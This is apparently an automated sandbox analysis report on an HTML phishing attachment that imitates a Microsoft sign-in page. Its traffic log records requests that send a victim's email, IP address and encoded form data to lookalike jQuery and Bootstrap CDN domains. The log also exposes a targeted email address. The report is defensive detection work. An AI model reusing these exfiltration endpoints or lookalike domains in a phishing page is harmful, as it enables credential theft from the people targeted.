Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
November Draw Disbursed.html

Overview

General Information

Sample Name:November Draw Disbursed.html
Analysis ID:756202
MD5:c0d6d8acc86ed388214581788ec837d8
SHA1:c846ee109e9ee8e373ff09412a59e3aeec06fd44
SHA256:2209177e77a2dabd0c034500ee64ccca71d8985c7c564ce31898ca2326bb6d78
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Snort IDS alert for network traffic
JA3 SSL client fingerprint seen in connection with other malware
Invalid 'forgot password' link found
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5928 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 1844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 5328 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
67505.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    Timestamp:192.168.2.38.8.8.855638532027758 11/29/22-19:59:13.326192
    SID:2027758
    Source Port:55638
    Destination Port:53
    Protocol:UDP
    Classtype:Potentially Bad Traffic
    Timestamp:192.168.2.38.8.8.853848532027758 11/29/22-19:59:15.999356
    SID:2027758
    Source Port:53848
    Destination Port:53
    Protocol:UDP
    Classtype:Potentially Bad Traffic

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Yara detected HtmlPhish10
    Source: Yara matchFile source: 67505.0.pages.csv, type: HTML
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Number of links: 1
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Number of links: 1
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.htmlHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: unknownHTTPS traffic detected: 162.19.88.68:443 -> 192.168.2.3:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.172.153.55:443 -> 192.168.2.3:49743 version: TLS 1.2

    Networking

    barindex
    Snort IDS alert for network traffic
    Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.3:55638 -> 8.8.8.8:53
    Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.3:53848 -> 8.8.8.8:53
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 152.199.23.72 152.199.23.72
    Source: Joe Sandbox ViewIP Address: 152.199.23.72 152.199.23.72
    Source: Joe Sandbox ViewIP Address: 68.65.123.205 68.65.123.205
    Source: unknownDNS traffic detected: queries for: clients2.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp/b1.js HTTP/1.1Host: descansonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.5.2.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.restConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.5.2.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.5.2.min.js HTTP/1.1Host: code.jquery.questConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.5.2.min.js HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.5.2.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.restConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-Modified-Since: Sun, 10 Jul 2022 19:22:15 GMT
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0O HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ip.php HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: i.postimg.cc
    Source: global trafficHTTP traffic detected: GET /ndata/index.php?dt=wendy.lang@dmv.ca.gov HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dmv.ca.gov HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=637227555210461681 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1Host: i.postimg.ccConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jSY8DXQL/back.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: i.postimg.cc
    Source: global trafficHTTP traffic detected: GET /dmv.ca.gov HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: logo.clearbit.com
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
